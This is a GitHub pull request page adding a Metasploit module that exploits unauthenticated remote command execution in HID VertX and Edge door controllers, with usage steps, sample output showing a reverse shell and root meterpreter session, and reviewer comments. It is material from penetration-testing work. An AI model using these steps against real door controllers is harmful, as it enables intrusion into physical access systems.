Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add HID discoveryd command_blink_on Unauthenticated RCE exploit #10133

Merged

Conversation

@bcoles
Copy link
Contributor

bcoles commented Jun 3, 2018

Add HID discoveryd command_blink_on Unauthenticated RCE exploit.

    This module exploits an unauthenticated remote command execution
    vulnerability in the discoveryd service exposed by HID VertX and Edge
    door controllers.

    This module was tested successfully on a HID Edge model EH400
    with firmware version 2.3.1.603 (Build 04/23/2012).

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce
  • set RHOST [IP]
  • set LHOST [IP]
  • run
  • Verify you get a root session

Example Output

msf5 > use exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce 
msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > set rhosts 10.123.123.123
rhosts => 10.123.123.123
msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > set lhost 10.1.1.197
lhost => 10.1.1.197
msf5 exploit(linux/misc/hid_discoveryd_command_blink_on_unauth_rce) > run

[*] Started reverse TCP handler on 10.1.1.197:4444 
[*] 10.123.123.123:4070 - Connecting to target
[*] Command Stager progress -   0.29% done (26/8993 bytes)
[*] Command Stager progress -   0.58% done (52/8993 bytes)
[*] Command Stager progress -   0.87% done (78/8993 bytes)
[*] Command Stager progress -   1.16% done (104/8993 bytes)
[...]
[*] Command Stager progress -  98.88% done (8892/8993 bytes)
[*] Command Stager progress -  99.17% done (8918/8993 bytes)
[*] Command Stager progress -  99.46% done (8944/8993 bytes)
[*] Command Stager progress -  99.68% done (8964/8993 bytes)
[*] Sending stage (806208 bytes) to 10.123.123.123
[*] Command Stager progress - 100.00% done (8993/8993 bytes)

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 10.123.123.123
OS           :  (Linux 2.6.28)
Architecture : armv5tejl
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter >
@bcoles bcoles added module docs labels Jun 3, 2018
@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Jun 7, 2018

I have no idea why this is failing Windows sanity tests..... @jmartin-r7 ?

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Jun 8, 2018

@bwatters-r7 This PR was submitted while msf infrastructure was having issues. Several PRs around the same time all failed for seemingly irrelevant reasons.

@jmartin-r7

This comment has been minimized.

Copy link
Member

jmartin-r7 commented Jun 8, 2018

Jenkins test this please.

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Jun 26, 2018

PCAP sent

@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Jul 6, 2018

Verified PCAP

@space-r7 space-r7 merged commit 2c0c99e into rapid7:master Jul 6, 2018
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
space-r7 added a commit that referenced this pull request Jul 6, 2018
msjenkins-r7 added a commit that referenced this pull request Jul 6, 2018
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Jul 6, 2018

Release Notes

The /exploits/linux/misc/hid_discoveryd_command_blink_on_unauth_rce module has been added to the framework. It exploits an unauthenticated remote command execution vulnerability in the discoveryd service exposed by HID VertX and Edge door controllers.

@bcoles bcoles deleted the bcoles:hid_discoveryd_command_blink_on_unauth_rce branch Jul 7, 2018
@tdoan-r7 tdoan-r7 added the rn-exploit label Jul 17, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

5 participants
You can’t perform that action at this time.